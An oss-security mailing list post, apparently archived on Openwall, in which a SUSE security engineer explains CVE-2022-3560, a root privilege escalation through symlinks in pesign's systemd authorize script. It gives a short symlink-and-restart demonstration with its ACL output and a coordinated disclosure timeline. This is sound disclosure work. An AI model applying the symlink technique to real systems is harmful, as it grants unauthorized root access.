Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Wed, 1 Feb 2023 11:05:49 +0100
From: Matthias Gerstner <mgerstner@...e.de>
To: oss-security@...ts.openwall.com
Subject: Re: pesign: Local privilege escalation on pesign
 systemd service

Hi,

On Tue, Jan 31, 2023 at 12:59:19PM -0300, Marco Benatto wrote:
> a local privilege escalation vulnerability was found in pesign. This
> vulnerability has been identified by CVE-2022-3560.

I would like to add some more details about the vulnerability:

The project ships a systemd service file that starts a pesign daemon
instance but also runs a StartPost script:

```
ExecStart=/usr/bin/pesign --daemonize
ExecStartPost=/usr/libexec/pesign/pesign-authorize
```

This pesign-authorize script is run with root privileges and grants a
dynamic list of users and groups recursively full access to
/etc/pki/pesign*/ and /run/pesign via POSIX access control lists.

The list of users is found in the root controlled files
/etc/pesign/users and /etc/pesign/groups. By default only pesign:pesign
are configured.

# The Vulnerability

Since the pesign-authorize script is run at every start of the pesign
service unit, the directory trees /etc/pki/pesign* and /run/pesign will
already be controlled by the unprivileged pesign:pesign user and group.
The script does not take precautions to prevent symlink attacks being
staged by a compromised unprivileged user account.

A simple demonstration of the attack would be this:

```
root# sudo -u pesign -g pesign ln -s /root /etc/pki/pesign/attack
root# systemctl restart pesign
root# getfactl /root
# file: root/
# owner: root
# group: root
user::rwx
user:pesign:rwx
group::---
group:pesign:rwx
mask::rwx
other::---
```

Therefore in a default configuration of pesign there is a local pesign
user or pesign group to root escalation that can be achieved at every
pesign.service unit start.

I reproduced this on Fedora 35 using pesign version 113 release 18.fc35.

# Timeline

- 2022-10-11: I reported this to secalert@...hat.com  offering
  coordinated disclosure.
- 2022-10-18: RedHat security assigned the CVE for the issue
- 2022-12-21: RedHat security communicated a coordinated release date
  for 2023-01-31.
- 2023-01-27: RedHat security shared the patch with us and informed the
  distros mailing list about issue and the upcoming release
- 2023-01-31: the issue has been published

Cheers

Matthias

-- 
Matthias Gerstner <matthias.gerstner@...e.de>
Security Engineer
https://www.suse.com/security
GPG Key ID: 0x14C405C971923553
 
SUSE Software Solutions Germany GmbH
HRB 36809, AG Nürnberg
Geschäftsführer: Ivo Totev, Andrew Myers, Andrew McDonald, Boudien Moerman

Download attachment "signature.asc" of type "application/pgp-signature" (834 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.